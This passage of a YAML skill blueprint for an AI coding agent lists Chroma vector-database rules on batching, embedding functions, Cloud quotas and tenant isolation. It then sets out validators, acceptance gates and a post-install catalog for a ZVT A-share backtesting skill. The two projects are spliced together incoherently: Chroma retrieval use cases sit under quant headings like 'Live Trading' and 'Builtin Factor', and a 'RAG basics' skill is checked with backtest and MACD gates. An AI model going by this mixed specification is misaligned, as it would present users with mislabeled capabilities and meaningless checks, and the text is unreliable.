    derived_from_bd_id: BD-004
  - id: chroma-C-015
    when: Setting both batch_size and sync_threshold inside CreateHNSWConfiguration or UpdateHNSWConfiguration.
    action: Ensure batch_size ≤ sync_threshold (defaults 100/1000); when raising batch_size, raise sync_threshold by at least
      the same amount.
    severity: high
    kind: domain_rule
    modality: must
    consequence: chromadb/api/configuration.py:281-287 cross-validates these — batch_size > sync_threshold raises ValueError
      and the CreateCollectionConfiguration construction fails outright.
    stage_ids:
    - index
    derived_from_bd_id: BD-005
  - id: chroma-C-016
    when: Running Chroma in a container (Docker/k8s) under cgroup CPU limits and using the default num_threads.
    action: Explicitly set num_threads in Settings or HNSW configuration (e.g. equal to the cgroup CPU quota); do NOT rely
      on the Rust default std::thread::available_parallelism() and the Python multiprocessing.cpu_count() to behave the same
      in containers.
    severity: medium
    kind: resource_boundary
    modality: should
    consequence: Rust available_parallelism() is cgroup-aware (returns the cgroup quota), but Python multiprocessing.cpu_count()
      returns the host's full CPU count by default. The two paths agree on bare metal but diverge under cgroups, potentially
      over-spawning threads and causing scheduler thrash or throttling.
    stage_ids:
    - index
  - id: chroma-C-017
    when: Writing custom scoring logic that distinguishes Chroma 'ip' vs 'cosine' space.
    action: Recognize that ip (inner product) and cosine share the same scalar implementation in Chroma rust/distance/src/distance.rs
      (`1 - sum(a[i]*b[i])`); the only difference is the assumed normalization — cosine assumes you normalize, ip is meant
      for un-normalized max-inner-product workloads.
    severity: medium
    kind: domain_rule
    modality: must
    consequence: If you mistakenly read ip as 'pure dot product' and treat a higher score as 'more similar', you invert the
      ranking — under 1-dot, smaller is more similar (the opposite of dot). You end up with reversed rankings.
    stage_ids:
    - index
  - id: chroma-C-018
    when: Switching the distance metric (space) or tuning ef_construction / max_neighbors on an existing Chroma collection.
    action: Do NOT expect collection.modify() to alter space / ef_construction / max_neighbors — these are static HNSW parameters
      baked into the graph at create time; you must create a new collection and rebuild.
    severity: high
    kind: architecture_guardrail
    modality: must_not
    consequence: UpdateHNSWConfiguration only exposes ef_search/num_threads/batch_size/sync_threshold/resize_factor — space/ef_construction/max_neighbors
      are not allowed. Forcing a change is a no-op or raises ValueError, and the tuning never takes effect.
    stage_ids:
    - index
    derived_from_bd_id: BD-017
  - id: chroma-C-020
    when: Bulk-adding/upserting many embeddings (> ~5000) to Chroma.
    action: Use chromadb.utils.batch_utils.create_batches(api, ids, embeddings, ...) to auto-split; do NOT cram everything
      into one collection.add() call.
    severity: high
    kind: resource_boundary
    modality: must
    consequence: EmbeddingsQueue's max_batch_size is computed dynamically from SQLite PRAGMA MAX_VARIABLE_NUMBER / 6 (modern
      SQLite=5461, legacy <3.32=166). Going over raises BatchSizeExceededError without silent truncation (embeddings_queue.py:198-203).
    stage_ids:
    - persistence
    derived_from_bd_id: BD-011
  - id: chroma-C-021
    when: Upgrading Chroma from < v0.5.6 to ≥ v0.5.6 and starting up for the first time.
    action: Run `chroma utils vacuum` once against the existing persist_directory; otherwise the SQLite WAL files do not auto-prune
      and the database grows without bound.
    severity: medium
    kind: operational_lesson
    modality: must
    consequence: Automatic WAL pruning was added after v0.5.6; older databases never enabled it. Without a one-time vacuum,
      chroma.sqlite3-wal grows unboundedly and eventually impacts disk usage and startup time.
    stage_ids:
    - persistence
    derived_from_bd_id: BD-015
  - id: chroma-C-022
    when: Building a single-tenant Chroma application.
    action: Be aware that default_tenant='default_tenant' / default_database='default_database' (config.py:83-84); HttpClient/CloudClient
      operating in multi-tenant mode must explicitly pass tenant + database, or writes will land in the default tenant alongside
      other tenants.
    severity: high
    kind: domain_rule
    modality: must
    consequence: In multi-tenant scenarios, omitting tenant/database routes all writes into default_tenant; tenant isolation
      is lost, leaking data across tenants or causing collection-name collisions.
    stage_ids:
    - persistence
    - client_factory
  - id: chroma-C-023
    when: Upgrading a Chroma Docker deployment to v1.0.0+.
    action: Switch the Docker volume mount point from /chroma/chroma to /data; the old path is no longer the default data
      directory in v1.0.0+ images.
    severity: high
    kind: operational_lesson
    modality: must
    consequence: If the Docker volume still points at /chroma/chroma, the new image starts up against an empty DB at /data;
      users assume data is lost when in fact the path drifted. Existing volume data must be migrated manually.
    stage_ids:
    - persistence
  - id: chroma-C-025
    when: Implementing a custom EmbeddingFunction class that extends chromadb.api.types.EmbeddingFunction Protocol.
    action: 'Implement all 6 abstractmethods: __call__, name, build_from_config, get_config, validate_config_update, default_space.'
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: The EmbeddingFunction Protocol lives at chromadb/api/types.py:826. Missing default_space() falls through
      to 'l2' at collection_configuration.py:442 (chroma-C-002). Missing build_from_config makes register_embedding_function
      fail.
    stage_ids:
    - embedding_function
  - id: chroma-C-026
    when: Reopening the same Chroma collection across processes or after a restart.
    action: Pass an embedding_function instance equivalent to the one used at creation time (same model, same dimension, same
      config) into client.get_collection(name=..., embedding_function=ef); do NOT assume Chroma will restore the EF from collection
      metadata.
    severity: high
    kind: claim_boundary
    modality: must
    consequence: EmbeddingFunction is NOT persisted into collection metadata (types.py:826-1000 protocol has no persist hook).
      A consumer that opens the same collection (even with the same dim) using a different EF gets geometrically different
      vectors; recall collapses with no error.
    stage_ids:
    - embedding_function
    derived_from_bd_id: BD-018
  - id: chroma-C-027
    when: A production deployment that needs to guarantee multiple consumer processes use a consistent EmbeddingFunction.
    action: Record the EF class name + model version + key config (e.g. model_name='text-embedding-3-small') for every collection
      in your own application metadata store (DB or config file); validate on every read and write.
    severity: high
    kind: operational_lesson
    modality: must
    consequence: 'See chroma-C-022. This is the remedy for the BD-G03 missing gap: Chroma offers no EF version validation,
      the caller must implement it. Otherwise process A using OpenAI EF and process B using SentenceTransformer EF (both 384d)
      get geometrically different vectors with no warning.'
    stage_ids:
    - embedding_function
    derived_from_bd_id: BD-G03
  - id: chroma-C-028
    when: Using Chroma's default DefaultEmbeddingFunction (ONNXMiniLM_L6_V2) on text that may exceed 256 tokens.
    action: Chunk the text yourself (chunk_size ≤ 256 tokens) before calling collection.add(); do NOT pass a long document
      directly — ONNXMiniLM_L6_V2 has max_seq_length=256 tokens and silently truncates.
    severity: medium
    kind: resource_boundary
    modality: must
    consequence: ONNX MiniLM has max_seq_length=256; Chroma issues no warning on overlong text and excess tokens are dropped
      silently. Long-document recall fails (only the first 256 tokens contribute to the embedding).
    stage_ids:
    - embedding_function
    derived_from_bd_id: BD-010
  - id: chroma-C-029
    when: A multi-tenant Chroma deployment that uses OpenAIEmbeddingFunction or another API-key-bearing EF.
    action: Do NOT write API keys into collection metadata or settings — EF API keys must come from environment variables
      or a secret manager, with the caller responsible for per-tenant isolation.
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: API keys placed in collection metadata leak via list_collections / export endpoints. BD-018 confirms EF is
      not persisted, implicitly stating API keys should not be stored in collections; sharing collection metadata across tenants
      leaks keys cross-tenant.
    stage_ids:
    - embedding_function
  - id: chroma-C-030
    when: Building Chroma multimodal retrieval (text + image, UC-004).
    action: Use a single shared-space EmbeddingFunction (e.g. OpenCLIPEmbeddingFunction) for both text and images in the same
      collection; do NOT mix text-only and image-only EFs.
    severity: high
    kind: domain_rule
    modality: must
    consequence: Different EFs produce vectors in different semantic spaces; cosine distance has no cross-modal meaning. Querying
      with an image returns text candidates that are completely unrelated, and multimodal retrieval breaks.
    stage_ids:
    - embedding_function
  - id: chroma-C-031
    when: Creating a collection on Chroma Cloud (CloudClient) and writing vectors.
    action: Ensure vector dim ≤ 4096; over-dim vectors are rejected by Cloud (HTTP error). Common EFs (OpenAI 1536/3072, SentenceTransformer
      384/768) are within range, but stacking multiple model averages or concatenations can exceed it.
    severity: high
    kind: resource_boundary
    modality: must
    consequence: docs/mintlify/cloud/quotas-limits.mdx explicitly lists dim ≤ 4096 as a hard Cloud limit; over-dim writes
      are rejected and the entire batch fails.
    stage_ids:
    - client_factory
    - index
    derived_from_bd_id: BD-012
  - id: chroma-C-032
    when: Calling collection.add() per batch on Chroma Cloud or collection.query(n_results=...).
    action: Cap each add batch at 300 records and n_results at 300; loop and split when more is needed.
    severity: high
    kind: resource_boundary
    modality: must
    consequence: 'Cloud quotas: records/write ≤ 300, n_results ≤ 300 (quotas-limits.mdx). Exceeding either returns a 4xx and
      the operation fails. Local PersistentClient is not subject to this.'
    stage_ids:
    - api_layer
    derived_from_bd_id: BD-012
  - id: chroma-C-033
    when: Writing compound where-clauses for Chroma Cloud collection.query(where={...}).
    action: Keep the total predicate (leaf-condition) count ≤ 8 in the where-clause; ≤ 32 metadata keys; per-record metadata
      value ≤ 8182B; per-collection ≤ 256B.
    severity: medium
    kind: resource_boundary
    modality: must
    consequence: 'Cloud quotas: where ≤ 8 predicates, metadata keys ≤ 32, value-length caps. Going over returns 4xx. Local
      deployments are not subject to this but should leave headroom for a future Cloud migration.'
    stage_ids:
    - api_layer
    derived_from_bd_id: BD-012
  - id: chroma-C-034
    when: Writing documents, URIs, or ids on Chroma Cloud.
    action: document length ≤ 16KB, URI ≤ 256B, ID ≤ 128B, metadata key name ≤ 36B; over-quota writes are rejected by Cloud.
    severity: medium
    kind: resource_boundary
    modality: must
    consequence: Cloud quota hard limits — exceedances are server-side rejections and the entire batch fails.
    stage_ids:
    - api_layer
    derived_from_bd_id: BD-012
  - id: chroma-C-035
    when: Planning collection count or per-collection capacity on a Chroma Cloud deployment.
    action: 'Per tenant: max_collections ≤ 1M, records/collection ≤ 5M, concurrent reads/writes per collection ≤ 10, fork
      edges ≤ 256.'
    severity: medium
    kind: resource_boundary
    modality: must
    consequence: Cloud multi-tenant fairness quotas; exceeding triggers throttling or rejection in the control plane. > 5M
      records/collection requires sharding across collections or a quota-bump request.
    stage_ids:
    - client_factory
    derived_from_bd_id: BD-012
  - id: chroma-C-036
    when: Designing Chroma collection snapshot / branching strategy.
    action: Do NOT assume local PersistentClient supports collection.fork() or zero-copy snapshots — that is Cloud-only (UC-007);
      local users must implement snapshots via export/import.
    severity: medium
    kind: claim_boundary
    modality: must_not
    consequence: Calling collection.fork() on a local client raises NotImplementedError or AttributeError; UC-007 is CloudClient-only.
    stage_ids:
    - api_layer
  - id: chroma-C-037
    when: Designing Chroma async batch jobs.
    action: Do NOT assume local PersistentClient/EphemeralClient expose an async Task API (task submit + poll) — that is Cloud-only
      (UC-010).
    severity: medium
    kind: claim_boundary
    modality: must_not
    consequence: Local clients have no task_api; calling client.task.* raises AttributeError. Local batching must be done
      via asyncio.to_thread or multiprocessing yourself.
    stage_ids:
    - client_factory
  - id: chroma-C-038
    when: Writing Chroma TypeScript client code (@chroma-core/chromadb-default-embed) that creates a collection.
    action: Be aware the TS client follows the same EF.defaultSpace()-priority logic as Python at collection-configuration.ts:99-110;
      a custom EmbeddingFunction must implement defaultSpace().
    severity: medium
    kind: domain_rule
    modality: must
    consequence: 'The TS client mirrors Python: when EF lacks defaultSpace(), space falls back to ''l2''; the constraint is
      consistent across languages and the same chroma-C-002 trap applies.'
    stage_ids:
    - embedding_function
    - index
  - id: chroma-C-039
    when: Writing Chroma Rust client crate code (without PyO3) for a high-level application.
    action: Do NOT assume the Rust crate exposes high-level Collection wrappers identical to Python — the Rust side is a lower-level
      server / pyo3 binding and does not provide convenience methods like Collection.add/.query; you must build the high-level
      API yourself around ServerAPI.
    severity: medium
    kind: claim_boundary
    modality: must_not
    consequence: Code that expects API parity with the Python client will fail to compile or behave wrongly; blueprint res-010
      explicitly notes the Rust crate 'does not provide a high-level Collection wrapper like Python'.
    stage_ids:
    - client_factory
  - id: chroma-C-040
    when: Implementing an alternative Chroma rust/distance algorithm or benchmarking distance computations.
    action: Be aware that Rust SIMD distance implementations (avx/avx512/sse/neon) fall back to scalar for vector lengths
      that are not a multiple of the SIMD register width; do NOT assume the SIMD path handles the entire vector.
    severity: low
    kind: operational_lesson
    modality: must
    consequence: rust/distance/src/distance_avx*.rs files invoke the scalar function for the unaligned tail; performance estimates
      must include that fallback overhead, especially for vectors whose dim is not a multiple of 8/16.
    stage_ids:
    - index
  - id: chroma-C-041
    when: Configuring a Chroma collection with a custom EmbeddingFunction + space=cosine.
    action: Do NOT assume Chroma will detect at write/query time whether EF outputs are L2-normalized — Chroma performs no
      runtime normalization check, and un-normalized vectors are silently accepted, yielding meaningless distance values.
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: 'BD-G01 missing gap: chroma has no EF normalization detection. distance.rs:9-15 directly does 1-dot; types.py:826-1000
      EF Protocol has no validation hook. The failure is fully silent.'
    stage_ids:
    - embedding_function
    - index
    derived_from_bd_id: BD-G01
  - id: chroma-C-042
    when: Implementing the __call__ output of a custom EmbeddingFunction.
    action: 'Self-assert at the output: `norm = np.linalg.norm(vec); assert 0.99 < norm < 1.01, f''EF output not L2-normalized:
      norm={norm}''`, as a sanity check.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: Remedy for BD-G01 missing gap. If a custom EF's internal model.encode config drifts (e.g. forgetting normalize_embeddings=True),
      the assert catches it immediately, preventing the silent error from propagating into cosine math.
    stage_ids:
    - embedding_function
    derived_from_bd_id: BD-G01
  - id: chroma-C-043
    when: Planning the Chroma collection EmbeddingFunction upgrade path.
    action: 'Do NOT assume chromadb provides an in-place dim migration tool — chromadb/utils/ has no such helper. You must
      implement: create_collection(new_name, ef=new_ef) → iterate the old collection in batches → re-embed → add to the new
      collection → assert count → flip the application reference.'
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: 'BD-G02 missing gap: chroma has no dimension-migration helper. Assuming a built-in tool exists leads to the
      upgrade jamming on InvalidDimensionException.'
    stage_ids:
    - embedding_function
    - index
    derived_from_bd_id: BD-G02
  - id: chroma-C-044
    when: Actually executing a Chroma collection EmbeddingFunction / dim upgrade.
    action: 'Run in this order: 1) client.create_collection(new_name, embedding_function=new_ef); 2) for batch in old_collection.get(include=[''documents'',''metadatas''],
      limit=create_batches_size, offset=...) → new_collection.add(ids, documents, metadatas); 3) assert new_collection.count()
      == old_collection.count(); 4) point application code at the new_collection; 5) only after validation: client.delete_collection(old_name).'
    severity: high
    kind: operational_lesson
    modality: must
    consequence: BD-G02 missing gap remedy. Skipping step 3's count check may drop data; deleting the old collection before
      step 4 validation makes data unrecoverable; ignoring create_batches limits triggers BatchSizeExceededError.
    stage_ids:
    - embedding_function
    derived_from_bd_id: BD-G02
  - id: chroma-C-045
    when: 'After upgrading to Chroma v1.0.0+ but the application code or deployment config still keeps any of: chroma_segment_cache_policy
      / chroma_memory_limit_bytes / chroma_server_thread_pool_size / chroma_server_nofile.'
    action: Do NOT assume chroma will emit a deprecation warning when these settings become inert under the Rust default path
      — chroma has no warning mechanism. You must grep config code yourself to confirm none of these settings are relied on.
    severity: medium
    kind: claim_boundary
    modality: must_not
    consequence: 'BD-G04 missing gap: under the v1.0.0+ Rust default path, four legacy settings silently become inert with
      no warning. Operators believe their tuning takes effect when in fact RustBindingsAPI ignores them entirely, and observed
      performance contradicts the config without an obvious cause.'
    stage_ids:
    - api_layer
    derived_from_bd_id: BD-G04
  - id: chroma-C-046
    when: The audit phase before upgrading a Chroma deployment to v1.0.0+.
    action: 'Before upgrade, grep the application code and config for the four legacy setting names (chroma_segment_cache_policy
      / chroma_memory_limit_bytes / chroma_server_thread_pool_size / chroma_server_nofile). For each hit, decide: keep means
      explicitly set chroma_api_impl=''chromadb.api.segment.SegmentAPI'' in Settings to force the Python path; otherwise remove
      it from Settings.'
    severity: medium
    kind: operational_lesson
    modality: must
    consequence: BD-G04 missing gap remedy. Without an active audit, operators end up trapped in the 'why isn't my Rust-path
      tuning taking effect?' blind spot.
    stage_ids:
    - api_layer
    derived_from_bd_id: BD-G04
  - id: chroma-C-047
    when: Configuring chroma as the vector store backend in mem0.
    action: Be aware chroma does not provide a keyword_search override (mem0 res-007 lists it among the 9 backends with no
      keyword_search), so mem0 hybrid search degrades to vector-only + entity_boost with no BM25/FTS.
    severity: medium
    kind: claim_boundary
    modality: must
    consequence: If you expected mem0 + chroma to provide hybrid keyword + semantic search, in practice you only get semantic
      recall; exact-keyword recall is missing. Evaluate whether the business case can tolerate it.
  - id: chroma-C-048
    when: Connecting to a multi-tenant Chroma server with HttpClient or CloudClient.
    action: Pass tenant + database explicitly (omitting them falls back to 'default_tenant' / 'default_database', shared by
      every tenant).
    severity: high
    kind: domain_rule
    modality: must
    consequence: Without tenant params, HttpClient/CloudClient land on the default namespace and tenant isolation breaks.
      AdminAPI is the entry point for creating additional tenants.
    stage_ids:
    - client_factory
  - id: chroma-C-049
    when: Implementing a custom Chroma SegmentManager.
    action: Local mode follows the 2-segment topology (VECTOR + METADATA); distributed mode follows the 3-segment topology
      (VECTOR + METADATA + RECORD). Do NOT manually add a BLOCKFILE_RECORD segment in local mode — it adds gratuitous write
      amplification.
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: LocalSegmentManager (local.py:140-149) and DistributedSegmentManager (distributed.py:46-77) differ in segment
      count to optimize for each deployment mode; forcing local to 3-segment increases SQLite write counts.
    stage_ids:
    - segment
    derived_from_bd_id: BD-008
  - id: chroma-C-050
    when: Designing a Chroma index-algorithm selection strategy.
    action: Do NOT assume HNSW vs SPANN can be switched per-collection — HNSW is single-node only, SPANN is distributed/Cloud
      only, and the choice is bound to the deployment topology, not configurable per collection.
    severity: medium
    kind: claim_boundary
    modality: must_not
    consequence: Specifying SPANN config on a PersistentClient is ignored or rejected; rust/segment/src/lib.rs shows the algorithm
      is bound to deployment topology.
    stage_ids:
    - index
    derived_from_bd_id: BD-008
  - id: chroma-C-051
    when: Using server-side embedding (UC-005, HttpClient mode running EF on the server).
    action: Ensure the chroma server's EF class and version (model_name + config) match the client expectation exactly — declare
      it via the embedding_function block in config.yaml, and validate at client startup against the embedding_function metadata
      returned by the server's /api/v2/healthcheck.
    severity: high
    kind: operational_lesson
    modality: must
    consequence: UC-005 must_validate explicitly lists 'server EF version matches client expectation'. If the server upgrades
      the EF model version without notifying the client, queries return results incompatible with historical vectors.
    stage_ids:
    - embedding_function
  - id: chroma-C-052
    when: Deploying OpenTelemetry monitoring for Chroma.
    action: Do NOT assume client-only deployments (EphemeralClient/PersistentClient) emit OTel signals automatically — OTel
      integration is a server-side feature (chroma run --config); client-only mode requires manual local logging.
    severity: low
    kind: claim_boundary
    modality: must_not
    consequence: UC-009 not_suitable_for explicitly lists client-only deployments; in client mode the trace_method decorator
      exists but no exporter is configured by default.
    stage_ids:
    - api_layer
output_validator:
  assertions:
  - id: OV-01
    check_predicate: all(p in inspect.getsource(zvt.factors.algorithm.macd) for p in ['slow=26', 'fast=12', 'n=9'])
    failure_message: 'FATAL: MACD params drifted from (fast=12, slow=26, n=9) — SL-08 violation, non-reproducible signals'
    business_meaning: Standard MACD parameters are a semantic lock; drift makes results incomparable with industry-standard
      indicators and non-reproducible.
    source_ids:
    - SL-08
    - BD-036
  - id: OV-02
    check_predicate: result.get('total_trades', 0) > 0 or result.get('explicit_zero_trade_ack') is True
    failure_message: Zero trades executed — likely missing pre-fetched data (see PC-02) or over-restrictive filters
    business_meaning: A backtest with zero trades is not a valid result; either data is missing or the strategy never triggered.
      Structural non-emptiness check is insufficient — we need business confirmation.
    source_ids:
    - SL-01
    - finance-C-073
  - id: OV-03
    check_predicate: result.get('annual_return') is None or abs(float(result['annual_return'])) <= 5.0
    failure_message: 'FATAL: |annual_return| > 500% — likely look-ahead bias or data error'
    business_meaning: Annual returns exceeding 500% are physically implausible for A-share strategies; indicates look-ahead
      bias or corrupt data.
    source_ids: []
  - id: OV-04
    check_predicate: result.get('holding_change_pct') is None or abs(float(result['holding_change_pct'])) <= 1.0
    failure_message: 'FATAL: |holding_change_pct| > 100% — physically impossible'
    business_meaning: Holding change percentage cannot exceed 100%; violation indicates position accounting error.
    source_ids:
    - BD-029
  - id: OV-05
    check_predicate: result.get('max_drawdown') is None or abs(float(result['max_drawdown'])) <= 1.0
    failure_message: 'FATAL: |max_drawdown| > 100% — impossible for non-leveraged account'
    business_meaning: Maximum drawdown cannot exceed 100% without leverage; violation indicates calculation error or look-ahead
      bias.
    source_ids: []
  - id: OV-06
    check_predicate: not (hasattr(result, 'trade_log') and result.trade_log and any(result.trade_log[i].action == 'sell' and
      i+1 < len(result.trade_log) and result.trade_log[i+1].action == 'buy' and result.trade_log[i].timestamp == result.trade_log[i+1].timestamp
      for i in range(len(result.trade_log)-1)))
    failure_message: 'FATAL: buy-before-sell detected in same cycle — SL-01 violation, creates implicit leverage'
    business_meaning: SL-01 requires sell() before buy() in each cycle; violation means available_long was not updated before
      buying, risking duplicate positions.
    source_ids:
    - SL-01
  scaffold:
    validate_py_path: '{workspace}/validate.py'
    tail_block: "# === DO NOT MODIFY BELOW THIS LINE ===\nif __name__ == \"__main__\":\n    result = run_backtest()\n    from\
      \ validate import enforce_validation\n    enforce_validation(result, output_path=\"{workspace}/result.csv\")\n# ===\
      \ END DO NOT MODIFY ==="
  enforcement_protocol: 1. Never edit validate.py. 2. Never delete the DO NOT MODIFY tail block from the main script. 3. Never
    wrap enforce_validation() in try/except. 4. Never rewrite result write logic — it MUST go through enforce_validation.
    5. If validate.py raises ImportError, fix the dependency, do not remove the call.
acceptance:
  hard_gates:
  - id: G1
    check: '{workspace}/result.csv exists AND file size > 0'
    on_fail: Strategy did not produce output; check run_backtest() return value and enforce_validation() call
  - id: G2
    check: '{workspace}/result.csv.validation_passed marker file exists'
    on_fail: Validation did not complete; review validate.py output and fix assertion failures
  - id: G3
    check: 'Main script contains literal: from validate import enforce_validation'
    on_fail: Validation chain stripped; re-add the import in the DO NOT MODIFY block
  - id: G4
    check: 'Main script contains literal: # === DO NOT MODIFY BELOW THIS LINE ==='
    on_fail: Validation fence removed; regenerate DO NOT MODIFY tail block
  - id: G5
    check: 'result.csv has at least 1 row: pandas.read_csv(result.csv).shape[0] >= 1'
    on_fail: Empty result; check if trade_log is non-empty and factors generated signals. Confirm PC-02 (k-data exists) passed.
  - id: G6
    check: 'If MACD strategy: source contains ''slow=26'' AND ''fast=12'' AND ''n=9'' in algorithm call'
    on_fail: MACD params drifted from SL-08 lock; restore standard (12, 26, 9)
  - id: G7
    check: 'For data pipeline tasks: result.csv contains ''entity_id'' and ''timestamp'' fields'
    on_fail: Missing required columns; check Mixin.query_data return schema and DataFrame MultiIndex reset_index() before
      writing
  - id: G8
    check: 'OV-03 passes: abs(annual_return) <= 5.0 (500%)'
    on_fail: Physical plausibility check failed; investigate look-ahead bias or data corruption in input kdata
  soft_gates:
  - id: SG-01
    rubric: 'Strategy narrative consistency: user intent aligns with generated strategy.py logic. dim_a: signal direction
      (buy/sell) matches intent [1-5, pass>=4]; dim_b: frequency (daily/intraday) aligns [1-5, pass>=4]; dim_c: risk controls
      match user intent [1-5, pass>=4].'
  - id: SG-02
    rubric: 'Factor combination quality. dim_a: no highly correlated factor duplication [1-5, pass>=4]; dim_b: multi-period
      alignment correct [1-5, pass>=4]; dim_c: liquidity filter present for A-share [1-5, pass>=4].'
  - id: SG-03
    rubric: 'Data source selection appropriateness. dim_a: coverage sufficient for target entities [1-5, pass>=4]; dim_b:
      provider latency acceptable for strategy frequency [1-5, pass>=4]; dim_c: no unauthorized provider used without credentials
      [1-5, pass>=4].'
skill_crystallization:
  trigger: all_hard_gates_passed AND user_opt_out_skill_saving != true
  output_path_template: '{workspace}/../skills/{slug}.skill'
  slug_template: '{blueprint_id_short}-{uc_id_lower}'
  captured_fields:
  - name
  - intent_keywords
  - entry_point_script
  - validate_script
  - fatal_constraints
  - spec_locks
  - preconditions
  - install_recipes
  - human_summary_translated
  action: 'After all Hard Gates PASS, resolve slug via slug_template using the executed UC, then write the .skill YAML file
    at output_path_template. Notify user in their detected locale: ''Skill saved as {slug}.skill — next time say one of {sample_triggers}
    from the matched UC to invoke directly.'''
  violation_signal: All hard gates passed but no .skill file exists at expected path
  skill_file_schema:
    name: finance-bp-138 / RAG basics (chat-with-your-documents)
    version: v6.1
    intent_keywords:
    - RAG
    - chat with documents
    - context-augmented generation
    - question answering
    entry_point: run_backtest
    fatal_guards:
    - SL-01
    - SL-02
    - SL-03
    - SL-04
    - SL-05
    - SL-06
    - SL-07
    - SL-08
    - SL-10
    - SL-11
    - SL-12
    spec_locks:
    - SL-01
    - SL-02
    - SL-03
    - SL-04
    - SL-05
    - SL-06
    - SL-07
    - SL-08
    - SL-09
    - SL-10
    - SL-11
    - SL-12
    preconditions:
    - PC-01
    - PC-02
    - PC-03
    - PC-04
post_install_notice:
  trigger: skill_installation_complete
  message_template:
    positioning: I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow.
    capability_catalog:
      group_strategy:
        source: auto_grouped
        strategy_reason: auto-grouped by UC.type (7 distinct values, balanced distribution)
      groups:
      - group_id: complete_strategy
        name: Complete Strategy
        description: ''
        emoji: 📦
        uc_count: 2
        ucs:
        - uc_id: UC-001
          name: RAG basics (chat-with-your-documents)
          short_description: Convert private documents into a vector store that can be retrieved and used as LLM context for
            question-answering
          sample_triggers:
          - RAG
          - chat with documents
          - context-augmented generation
        - uc_id: UC-004
          name: Multimodal retrieval (text + image)
          short_description: Index text and images in a single collection using a shared embedding space (e.g., CLIP) for
            cross-modal retrieval
          sample_triggers:
          - multimodal
          - image
          - CLIP
      - group_id: screening_logic
        name: Screening Logic
        description: ''
        emoji: 📦
        uc_count: 1
        ucs:
        - uc_id: UC-002
          name: Where-Filter metadata-scoped retrieval
          short_description: Filter a large vector collection by metadata fields (source, date, category, numeric range) BEFORE
            semantic search to scope candidates
          sample_triggers:
          - where filter
          - metadata filtering
          - $eq
      - group_id: data_pipeline
        name: Data Pipeline
        description: ''
        emoji: 📊
        uc_count: 1
        ucs:
        - uc_id: UC-003
          name: Local persistent database (PersistentClient)
          short_description: Single-machine persistent vector store that survives process restarts, no server deployment required
          sample_triggers:
          - PersistentClient
          - persistence
          - local database
      - group_id: extension_example
        name: Extension Example
        description: ''
        emoji: 📦
        uc_count: 2
        ucs:
        - uc_id: UC-005
          name: Server-side embedding (thin client)
          short_description: Thin client sends raw text; chroma server runs the embedding function
          sample_triggers:
          - server-side embedding
          - thin client
          - HttpClient
        - uc_id: UC-006
          name: Custom Embedding Function
          short_description: Replace default ONNXMiniLM_L6_V2 with custom in-house model or third-party API (Cohere/Jina/Voyage/etc.)
          sample_triggers:
          - custom embedding
          - EmbeddingFunction
          - alternative embedding
      - group_id: live_trading
        name: Live Trading
        description: ''
        emoji: 📦
        uc_count: 2
        ucs:
        - uc_id: UC-007
          name: Collection Forking (zero-copy snapshot)
          short_description: Cloud-only feature — fork a collection to take a logical snapshot for A/B testing or point-in-time
            rollback
          sample_triggers:
          - fork
          - snapshot
          - branch collection
        - uc_id: UC-008
          name: Production Deployment (Docker / Terraform / systemd)
          short_description: Deploy chroma server to AWS / GCP / Render / bare-metal with persistent volume + auth + OTel
            observability
          sample_triggers:
          - deployment
          - Terraform
          - Docker
      - group_id: monitoring
        name: Monitoring
        description: ''
        emoji: 📦
        uc_count: 1
        ucs:
        - uc_id: UC-009
          name: Observability / OTel Monitoring
          short_description: Collect chroma server traces and metrics via OpenTelemetry collector for production monitoring
          sample_triggers:
          - observability
          - OTel
          - tracing
      - group_id: builtin_factor
        name: Builtin Factor
        description: ''
        emoji: 🧮
        uc_count: 1
        ucs:
        - uc_id: UC-010
          name: Cloud Task API (async batch jobs)
          short_description: Submit asynchronous bulk-processing tasks to Chroma Cloud (large-batch re-embed/re-index/recompute)
            and poll for results
          sample_triggers:
          - task
          - async
          - batch
    call_to_action: Tell me which one you want to try.
    featured_entries:
    - uc_id: UC-001
      beginner_prompt: Try rag basics (chat-with-your-documents)
      auto_selected: true
    - uc_id: UC-002
      beginner_prompt: Try where-filter metadata-scoped retrieval
      auto_selected: true
    - uc_id: UC-003
      beginner_prompt: Try local persistent database (persistentclient)
      auto_selected: true
    more_info_hint: Ask me 'what else can you do?' to see all 10 capabilities.
  locale_rendering:
    instruction: On skill_installation_complete, translate ALL user-facing strings (positioning + capability_catalog.groups[].name
      + capability_catalog.groups[].description + capability_catalog.groups[].ucs[].short_description + call_to_action + featured_entries[].beginner_prompt
      + more_info_hint) into detected user locale per locale_contract. Preserve UC-IDs, group_id, emoji, and sample_triggers
      verbatim.
    preserve_verbatim:
    - UC-IDs
    - group_id
    - emoji
    - sample_triggers
    - technical_class_names
  enforcement:
    action: 'Host agent MUST send composed message to user as the FIRST user-facing response after skill_installation_complete
      event. Message MUST contain: positioning, capability_catalog (rendered as markdown tables per group), 3 featured_entries,
      call_to_action, and more_info_hint.'
    violation_code: PIN-01
    violation_signal: First user-facing message post-install does not contain the full capability_catalog (all UCs grouped)
      OR skips featured_entries OR skips call_to_action.
human_summary:
  persona: Doraemon
  what_i_can_do:
    tagline: 'I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me
      what you want; I''ll write the code, you don''t have to dig docs. (Heads up: ZVT natively supports A-share, HK, and
      crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don''t bother for serious work.)'
    use_cases:
    - Local persistent database (PersistentClient)
    - Where-Filter metadata-scoped retrieval
    - RAG basics (chat-with-your-documents)
    - A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney
    - 'End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader'
    - Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout
    - Index composition data collection (SZ1000, SZ2000) with EM recorder
  what_i_auto_fetch:
  - ZVT stage pipeline structure (data_collection → visualization) from LATEST.yaml
  - Semantic locks (SL-01 through SL-12) — especially sell-before-buy ordering and MACD params
  - Fatal constraints (finance-C-*) relevant to your target strategy type
  - 'Default parameters: MACD(12,26,9), hfq adjustment, buy_cost=0.001, base_capital=1M CNY'
  - Entity ID format (stock_sh_600000) and DataFrame MultiIndex convention
  - Provider-specific recorder class names and required class attributes
  what_i_ask_you:
